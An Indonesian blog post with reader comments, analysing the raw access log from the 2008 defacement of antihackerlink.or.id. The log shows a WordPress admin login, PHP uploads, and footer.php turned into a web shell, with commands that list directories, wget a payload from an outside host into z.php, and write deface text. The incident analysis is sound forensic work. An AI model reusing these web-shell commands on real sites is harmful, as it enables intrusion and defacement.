Part II – antihackerlink was hacked

On December 17, 2008, in My Community, Uncategorized, by fl3xu5

Mohon maaf sebelumnya atas keterlambatan posting di blog ini mengenai part 2 antihackerlink was hacked, dikarenakan kesibukan dunia nyata.:). Ok langsung saja kali ini analisa forensic dilakukan melalui raw log access server antihackerlink Disini kami sengaja hanya  sediakan log access tersebut. Silahkan analisa bersama disini :) .

88.237.213.52 – - [04/Dec/2008:04:52:28 +0700] “GET / HTTP/1.1″
88.237.213.52 – - [04/Dec/2008:04:53:21 +0700] “GET /?page_id=2 HTTP/1.1″ 200 12535 ”
88.237.213.52 – - [04/Dec/2008:04:54:23 +0700] “GET / HTTP/1.1″ <- “http://www.google.com/search?client=opera&rls=tr&q=antihackerlink.or.id&sourceid=opera&ie=utf-8&oe=utf-8″
88.237.213.52 – - [04/Dec/2008:05:01:50 +0700] “GET /wp-login.php HTTP/1.1″
88.237.213.52 – - [04/Dec/2008:05:01:58 +0700] “POST /wp-login.php HTTP/1.1″
88.237.213.52 – - [04/Dec/2008:05:01:59 +0700] “GET /wp-admin/ HTTP/1.1″ <- “http://antihackerlink.or.id/wp-login.php”
88.237.213.52 – - [04/Dec/2008:05:02:06 +0700] “GET /wp-admin/edit.php HTTP/1.1″
88.237.213.52 – - [04/Dec/2008:05:02:10 +0700] “GET /wp-admin/post.php?action=edit&post=34 HTTP/1.1″
88.237.213.52 – - [04/Dec/2008:05:02:51 +0700] “GET /wp-admin/media-upload.php?post_id=34&type=image& HTTP/1.1″
88.237.213.52 – - [04/Dec/2008:05:03:00 +0700] “POST /wp-admin/async-upload.php HTTP/1.1″
88.237.213.52 – - [04/Dec/2008:05:03:05 +0700] “POST /wp-admin/async-upload.php HTTP/1.1″
88.237.213.52 – - [04/Dec/2008:05:03:26 +0700] “POST /wp-admin/admin-ajax.php HTTP/1.1″ <- “http://antihackerlink.or.id/wp-admin/post.php?action=edit&post=34″
88.237.213.52 – - [04/Dec/2008:05:03:26 +0700] “POST /wp-admin/admin-ajax.php HTTP/1.1″ <- “http://antihackerlink.or.id/wp-admin/post.php?action=edit&post=34″
88.237.213.52 – - [04/Dec/2008:05:03:35 +0700] “GET /wp-content/uploads/2008/12/405.php HTTP/1.1″
88.237.213.52 – - [04/Dec/2008:05:03:39 +0700] “GET /wp-content/uploads/2008/12/405.php/ HTTP/1.1″
88.237.213.52 – - [04/Dec/2008:05:04:31 +0700] “GET /wp-admin/media-upload.php?post_id=34&type=image& HTTP/1.1″
88.237.213.52 – - [04/Dec/2008:05:04:44 +0700] “POST /wp-admin/media-upload.php?type=image&tab=type&post_id=34 HTTP/1.1″
88.237.213.52 – - [04/Dec/2008:05:05:18 +0700] “GET /wp-content/uploads/2008/12/403.php HTTP/1.1″
88.237.213.52 – - [04/Dec/2008:05:05:20 +0700] “GET /wp-content/uploads/2008/12/403.php/ HTTP/1.1″
….. ……
….. ……
….. ……
….. ……
88.237.213.52 – - [04/Dec/2008:05:05:50 +0700] “GET /wp-admin/theme-editor.php HTTP/1.1″
88.237.213.52 – - [04/Dec/2008:05:06:04 +0700] “GET /wp-admin/theme-editor.php?file=/themes/illacrimo/footer.php&theme=Illacrimo HTTP/1.1″
88.237.213.52 – - [04/Dec/2008:05:06:39 +0700] “POST /wp-admin/theme-editor.php HTTP/1.1″
88.237.213.52 – - [04/Dec/2008:05:06:50 +0700] “GET /wp-admin/theme-editor.php?file=/themes/illacrimo/footer.php&theme=Illacrimo&a=te HTTP/1.1″
88.237.213.52 – - [04/Dec/2008:05:07:18 +0700] “POST /wp-admin/theme-editor.php HTTP/1.1″
88.237.213.52 – - [04/Dec/2008:05:07:42 +0700] “GET /wp-admin/theme-editor.php?file=/themes/illacrimo/footer.php&theme=Illacrimo&a=te HTTP/1.1″
88.237.213.52 – - [04/Dec/2008:05:09:56 +0700] “POST /wp-admin/theme-editor.php HTTP/1.1″
88.237.213.52 – - [04/Dec/2008:05:10:08 +0700] “GET /wp-content/themes/illacrimo/footer.php HTTP/1.1″
88.237.213.52 – - [04/Dec/2008:05:11:52 +0700] “POST /wp-admin/theme-editor.php HTTP/1.1″
88.237.213.52 – - [04/Dec/2008:05:11:53 +0700] “GET /wp-admin/theme-editor.php?file=/themes/illacrimo/footer.php&theme=Illacrimo&a=te HTTP/1.1″
88.237.213.52 – - [04/Dec/2008:05:11:58 +0700] “GET //wp-content/themes/illacrimo/footer.php HTTP/1.1″
88.237.213.52 – - [04/Dec/2008:05:12:00 +0700] “GET //wp-content/themes/illacrimo/footer.php HTTP/1.1″
88.237.213.52 – - [04/Dec/2008:05:12:05 +0700] “GET //wp-content/themes/illacrimo/
88.237.213.52 – - [04/Dec/2008:05:12:08 +0700] “GET //wp-content/themes/illacrimo/v4.php
88.237.213.52 – - [04/Dec/2008:05:12:09 +0700] “GET //wp-content/themes/illacrimo/v4.php
88.237.213.52 – - [04/Dec/2008:05:12:15 +0700] “GET //wp-content/themes/illacrimo/v454.php
—————-
88.237.213.52 – - [04/Dec/2008:05:12:54 +0700] “GET //wp-content/themes/illacrimo/footer.php HTTP/1.1″
88.237.213.52 – - [04/Dec/2008:05:13:04 +0700] “GET //wp-content/themes/illacrimo/footer.php?cmd=ls HTTP/1.1″
88.237.213.52 – - [04/Dec/2008:05:13:08 +0700] “GET //wp-content/themes/illacrimo/footer.php?cmd=ls%20-lia HTTP/1.1″
88.237.213.52 – - [04/Dec/2008:05:13:45 +0700] “GET //wp-content/themes/illacrimo/footer.php?cmd=wget%20http://hackzone.kiev.ua/403.txt;mv%20403.txt%20z.php;ls%20-lia HTTP/1.1″
88.237.213.52 – - [04/Dec/2008:05:14:02 +0700] “GET //wp-content/themes/illacrimo/footer.php?cmd=wget%20http://hackzone.kiev.ua/403.txt;ls%20-lia HTTP/1.1″
88.237.213.52 – - [04/Dec/2008:05:14:28 +0700] “GET //wp-content/themes/illacrimo/footer.php?cmd=wget%20http://0d4y.org;ls%20-lia HTTP/1.1″
88.237.213.52 – - [04/Dec/2008:05:15:13 +0700] “GET //wp-content/themes/illacrimo/footer.php?cmd=pwd HTTP/1.1″
88.237.213.52 – - [04/Dec/2008:05:15:26 +0700] “GET //wp-content/themes/illacrimo/footer.php?cmd=ls%20-lia%20/home/sakitjiw/public_html/antihackerlink.or.id/ HTTP/1.1″
88.237.213.52 – - [04/Dec/2008:05:15:49 +0700] “GET /v4.php HTTP/1.1″
88.237.213.52 – - [04/Dec/2008:05:18:59 +0700] “GET //wp-content/themes/illacrimo/footer.php?cmd=cd%20/home/sakitjiw/public_html/antihackerlink.or.id/;echo%20′hacked%20ogi%20′%3Ev4.php HTTP/1.1″
88.237.213.52 – - [04/Dec/2008:05:19:05 +0700] “GET /v4.php
88.237.213.52 – - [04/Dec/2008:05:20:18 +0700] “GET //wp-content/themes/illacrimo/footer.php?cmd=cd%20/home/sakitjiw/public_html/antihackerlink.or.id/;echo%20x%20%3Ev4.php HTTP/1.1″
88.237.213.52 – - [04/Dec/2008:05:20:21 +0700] “GET /v4.php
88.237.213.52 – - [04/Dec/2008:05:24:27 +0700] “GET //wp-content/themes/illacrimo/footer.php?cmd=cd%20/home/sakitjiw/public_html/antihackerlink.or.id/;echo%20%3Ccenter%3E%3Ch2%3E%20%20Hacked%20%3Cbr%3E%20%20By_Ogmass%20&%20S4S_7%3Cbr%3E%20%20Got%20RooT%20?%3Cbr%3E%20%20uid=0(ogis4s)%20gid=0(ogis4s)%20groups=0(ogis4s)%3Cbr%3E%20%20Linux%20aquarius.romantis.net%202.6.9-023stab044.11-enterprise HTTP/1.1″
88.237.213.52 – - [04/Dec/2008:05:24:36 +0700] “GET /v4.php HTTP/1.1″
88.237.213.52 – - [04/Dec/2008:05:25:19 +0700] “GET //wp-content/themes/illacrimo/footer.php?cmd=cd%20/home/sakitjiw/public_html/antihackerlink.or.id/;echo’%3Ccenter%3E%3Ch2%3E%20%20Hacked%20%3Cbr%3E%20%20By_Ogmass%20&%20S4S_7%3Cbr%3E%20%20Got%20RooT%20?%3Cbr%3E%20%20uid=0(ogis4s)%20gid=0(ogis4s)%20groups=0(ogis4s)%3Cbr%3E%20%20Linux%20aquarius.romantis.net%202.6.9-023stab044.11-enterprise HTTP/1.1″
88.237.213.52 – - [04/Dec/2008:05:25:22 +0700] “GET /v4.php HTTP/1.1″
88.237.213.52 – - [04/Dec/2008:05:26:59 +0700] “GET //wp-content/themes/illacrimo/footer.php?cmd=cd%20/home/sakitjiw/public_html/antihackerlink.or.id/;echo’Hacked%20By_Ogmass%20&%20S4S_7′%3Ev4.php HTTP/1.1″
88.237.213.52 – - [04/Dec/2008:05:27:01 +0700] “GET /v4.php HTTP/1.1″
88.237.213.52 – - [04/Dec/2008:05:27:27 +0700] “GET //wp-content/themes/illacrimo/footer.php?cmd=cd%20/home/sakitjiw/public_html/antihackerlink.or.id/;echo%20′%20Hacked%20By_Ogmass%20&%20S4S_7%20′%20%3Ev4.php HTTP/1.1″
88.237.213.52 – - [04/Dec/2008:05:27:41 +0700] “GET / HTTP/1.1″
88.237.213.52 – - [04/Dec/2008:05:28:17 +0700] “GET //wp-content/themes/illacrimo/footer.php?cmd=cd%20/home/sakitjiw/public_html/antihackerlink.or.id/; HTTP/1.1″
88.237.213.52 – - [04/Dec/2008:05:28:45 +0700] “GET //wp-content/themes/illacrimo/footer.php?cmd=http://hackzone.kiev.ua/403.txt? HTTP/1.1″
88.237.213.52 – - [04/Dec/2008:05:28:49 +0700] “GET //wp-content/themes/illacrimo/footer.php?cmd=http://hackzone.kiev.ua/403.txt? HTTP/1.1″
88.237.213.52 – - [04/Dec/2008:05:28:51 +0700] “GET //wp-content/themes/illacrimo/footer.php?cmd=http://hackzone.kiev.ua/403.txt? HTTP/1.1″
88.237.213.52 – - [04/Dec/2008:05:28:59 +0700] “GET //wp-content/themes/illacrimo/footer.php?cmd=http://hackzone.kiev.ua HTTP/
88.237.213.52 – - [04/Dec/2008:05:29:03 +0700] “GET //wp-content/themes/illacrimo/footer.php?cmd= HTTP/1.1″
88.237.213.52 – - [04/Dec/2008:05:29:08 +0700] “GET //wp-content/themes/illacrimo/footer.php?cmd=pwd HTTP/1.1″
88.237.213.52 – - [04/Dec/2008:05:29:53 +0700] “GET //wp-content/themes/illacrimo/footer.php?cmd=cd%20/home/sakitjiw/public_html/antihackerlink.or.id/wp-content/themes/;ls%20-lia HTTP/1.1″

88.237.213.52 – - [04/Dec/2008:05:30:48 +0700] “GET /wp-admin/post-new.php HTTP/1.1″
………………………
88.237.213.52 – - [04/Dec/2008:06:46:38 +0700] “GET / HTTP/1.1″2286 “http://www.zone-h.org/component/option,com_attacks/Itemid,45/filter_defacer,By_Ogmass/”

http://fl3xu5.web.id/wp-content/plugins/sociofluid/images/digg_48.png http://fl3xu5.web.id/wp-content/plugins/sociofluid/images/reddit_48.png http://fl3xu5.web.id/wp-content/plugins/sociofluid/images/dzone_48.png http://fl3xu5.web.id/wp-content/plugins/sociofluid/images/stumbleupon_48.png http://fl3xu5.web.id/wp-content/plugins/sociofluid/images/delicious_48.png http://fl3xu5.web.id/wp-content/plugins/sociofluid/images/blinklist_48.png http://fl3xu5.web.id/wp-content/plugins/sociofluid/images/blogmarks_48.png http://fl3xu5.web.id/wp-content/plugins/sociofluid/images/furl_48.png http://fl3xu5.web.id/wp-content/plugins/sociofluid/images/newsvine_48.png http://fl3xu5.web.id/wp-content/plugins/sociofluid/images/technorati_48.png http://fl3xu5.web.id/wp-content/plugins/sociofluid/images/magnolia_48.png http://fl3xu5.web.id/wp-content/plugins/sociofluid/images/google_48.png http://fl3xu5.web.id/wp-content/plugins/sociofluid/images/myspace_48.png http://fl3xu5.web.id/wp-content/plugins/sociofluid/images/facebook_48.png http://fl3xu5.web.id/wp-content/plugins/sociofluid/images/yahoobuzz_48.png http://fl3xu5.web.id/wp-content/plugins/sociofluid/images/sphinn_48.png http://fl3xu5.web.id/wp-content/plugins/sociofluid/images/mixx_48.png http://fl3xu5.web.id/wp-content/plugins/sociofluid/images/twitter_48.png http://fl3xu5.web.id/wp-content/plugins/sociofluid/images/jamespot_48.png http://fl3xu5.web.id/wp-content/plugins/sociofluid/images/meneame_48.png
Tagged with:
 

17 Responses to “Part II – antihackerlink was hacked”

  1. shidex says:
    December 17, 2008 at 1:14 pm

    aw aw aw aw..
    bikin themes wp sendiri aja que que que

    brb kabooor..benerin py gw juga sapa tau bisa kek gt

    Reply
  2. andyan says:
    December 17, 2008 at 1:18 pm

    setelah baca berkali2 nggak ngerti maksudnya

    Reply
  3. kuc1n9_bl4ck says:
    December 17, 2008 at 1:35 pm

    WEkzz,,what is the kamsud omz fl3xu5…huehehehe..:D

    88.237.213.52 – - [04/Dec/2008:05:27:27 +0700] “GET //wp-content/themes/illacrimo/footer.php?cmd=cd%20/home/sakitjiw/public_html/antihackerlink.or.id/;echo%20′%20Hacked%20By_Ogmass%20&%20S4S_7%20′%20%3Ev4.php HTTP/1.1″

    Reply
  4. EA Ngel says:
    December 17, 2008 at 1:51 pm

    Setelah ak baca berulang², emank uda dari awal mereka menjadikan antihacerlink menjadi target yg akan mereka deface, bisa di lihat diatas mereka melihat dan mencoba² masuk di setiap file / folder dengan menggunakan teknik hacking yg beda dari biasanya org² lain lakukan. Jd klo menurut ak, mereka (defacer turki) tdk terfokus aja pada exploit publik doank, mereka memakai cara altrenatif yg uda jarang di pakai :) Keren mereka. Thanks atas Part II Antihackerlink Bang fl3xu5

    Reply
  5. blank_alpha says:
    December 17, 2008 at 2:31 pm

    emang..
    tersangka keliatannya bingung..
    masuk direktori satu persatu..
    salut buat tersangka, hha..

    kaboooorr….

    Reply
  6. ijoo says:
    December 17, 2008 at 2:31 pm

    hohoohoh…
    sakitjiwa tuh si arif ya…
    ixoxioxioxioo.. ngapain dia ya?

    Reply
  7. emberbocor says:
    December 17, 2008 at 2:46 pm

    wooh…
    keren….

    =========
    kaboor…

    @sakitjiwa : :)

    Reply
  8. The curious Psycho says:
    December 17, 2008 at 3:50 pm

    Bro…..

    apa Wp na antihackerlink tak ter update??

    Oia, ngambil exploit dr http://hackzone.kiev.ua/403.txt;mv%20403.txt%20z.php;ls%20-lia kah??

    Reply
  9. petunia says:
    December 18, 2008 at 8:14 am

    Asem wp ditelen juga…
    ijin copas mas buat dplajari

    Reply
  10. l41n says:
    December 18, 2008 at 2:03 pm

    just as i had predicted xD~

    Reply
  11. Rindho says:
    December 18, 2008 at 7:07 pm

    hihihi kok liat nya langsung footer.php….
    kalo menurut aku sih…..
    di baca yah di http://rindho.com/?sub=view&id=9&kategori=forensic%20antihackerlink.or.id%20part%20II

    :D

    Reply
  12. gech4 says:
    December 18, 2008 at 11:06 pm

    maap bang ,ndak ngerti
    qeqe
    wp ,wp ,punyaku jg gag update xixixi

    Reply
  13. sakitjiwa says:
    December 19, 2008 at 5:48 pm

    @rindho
    sipppppppppppppppppppppppp tq

    Reply
  14. fl3xu5 says:
    December 19, 2008 at 6:07 pm

    thanks to sakitjiwa n JinX :)

    tambahan : http://www.milw0rm.com/exploits/6421

    Regards,
    fl3xu5

    Reply
  15. ArieL, FX says:
    December 20, 2008 at 7:23 pm

    woala..

    koq bisa masuk ke google vuln nya?

    Reply
  16. satria.permana says:
    December 22, 2008 at 12:52 am

    pakar-pakar security emang kudu jeli nih.. ampe segitunya..
    Klo disuruh baca log spt itu wadaw.. ampun deh. Baca log program aja maless.. :p

    Reply
  17. radiaku says:
    December 25, 2008 at 8:55 pm

    Wew, jadi dia masuk ke wp, lalu edit footer membuat bug sendiri alias membikin code RFI sendiri. Lalu dia membuka folder satu persatu gitu bang

    Ini hanya kommentar sederhana lho, soalnya belum neliti lebih jauh.

    ane mau ngacir dulu.

    —————————————>> ngacir

    Reply

Leave a Reply



Page 1 of 11
Go To Top »
Get Adobe Flash playerPlugin by wpburn.com wordpress themes

Looking for something?

Use the form below to search the site:

Still not finding what you're looking for? Drop a comment on a post or contact us so we can take care of it!

Powered By

























Recent Comments